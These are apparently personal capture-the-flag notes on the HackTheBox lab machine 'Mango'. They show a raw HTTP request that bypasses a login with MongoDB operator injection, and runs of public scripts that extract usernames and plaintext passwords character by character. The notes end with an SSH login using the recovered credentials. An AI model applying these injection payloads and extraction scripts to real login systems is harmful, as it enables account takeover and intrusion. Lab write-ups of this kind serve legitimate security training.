2 :80 :443

https://mango.htb/ | https://staging-order.mango.htb/
google like page but Mango
| username top-right: MrR3boot

https://mango.htb/analytics.php
analytics page
| *.codepen.io v2.9.8
# no exploits found.

http://mango.htb/
Forbidden
You don't have permission to access this resource

http://staging-order.mango.htb/
login page for ordering mangoes
# default creds not working

# mongo injection via burp
POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://staging-order.mango.htb
Referer: http://staging-order.mango.htb/
Cookie: PHPSESSID=3e6uhh8orqhor6rq1en790ks4l

username=admin&password[$ne]=admin&login=login

# works > http://staging-order.mango.htb/home.php
| please email: admin@mango.htb

Using https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin

Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango

2 username(s) found:
admin
mango

Using https://book.hacktricks.xyz/pentesting-web/nosql-injection#brute-force-login-usernames-and-passwords-from-post-login

# modifying code
url = "http://staging-order.mango.htb/"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "mo1lred4k522pj016skrbru2oc"}

$ python exploit.py
Found username starting with a
^ad
^adm
^admi
^admin
Found username: admin
Found username starting with m
^ma
^man
^mang
^mango
Found username: mango
Extracting password of admin
Found password t9KcS3>!0B#2 for username admin
Extracting password of mango
Found password h3mXK8RhU~f{]f5H for username mango

# ssh mango:h3mXK8RhU~f{]f5H works

$ ssh mango@10.10.10.162

mango@mango:~$ whoami;id;hostname
mango
uid=1000(mango) gid=1000(mango) groups=1000(mango)
mango

Last updated